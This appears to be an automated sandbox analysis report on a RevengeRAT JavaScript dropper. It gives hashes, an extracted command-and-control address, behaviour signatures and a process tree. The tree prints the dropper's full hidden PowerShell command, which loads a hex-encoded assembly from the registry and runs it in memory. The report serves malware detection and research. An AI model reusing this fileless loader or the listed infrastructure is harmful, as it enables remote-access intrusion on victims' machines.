Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-01-2025 03:19
Static task
static1
Behavioral task
behavioral1
Sample
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
Resource
win10v2004-20241007-en
General
-
Target
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
-
Size
253KB
-
MD5
453bc0d9d84305bd4811c8c0c8622db6
-
SHA1
85553506f2dc5abcec56a06cb36f69c0b046efa4
-
SHA256
862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7
-
SHA512
af6ef42e885481ae3bc0939017c8eb328531ea50d7eb852bd7b5b744a70d202e57f09f2671ab1553c05d4c53181973896c44109e7eb19f7fb0d087f697632d87
-
SSDEEP
6144:p8t+pgvJENiy2BMs+1WKKL7EVLy19uQTuol9nv2RWoaAImBeN1PXY1qm:p8kpgvJENZ2JJLm
Malware Config
Extracted
revengerat
NyanCatRevenge
13.49.66.229:333
8a25aa6e78e44708a
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 26 IoCs
flow pid Process 11 3028 powershell.exe 15 3028 powershell.exe 16 3028 powershell.exe 20 3028 powershell.exe 26 3028 powershell.exe 40 3028 powershell.exe 41 3028 powershell.exe 42 3028 powershell.exe 43 3028 powershell.exe 44 3028 powershell.exe 48 3028 powershell.exe 49 3028 powershell.exe 50 3028 powershell.exe 51 3028 powershell.exe 52 3028 powershell.exe 59 3028 powershell.exe 60 3028 powershell.exe 61 3028 powershell.exe 62 3028 powershell.exe 63 3028 powershell.exe 64 3028 powershell.exe 65 3028 powershell.exe 66 3028 powershell.exe 67 3028 powershell.exe 68 3028 powershell.exe 69 3028 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3028 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3028 powershell.exe 3028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3028 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1868 wrote to memory of 3028 1868 wscript.exe 84 PID 1868 wrote to memory of 3028 1868 wscript.exe 84
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','30');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82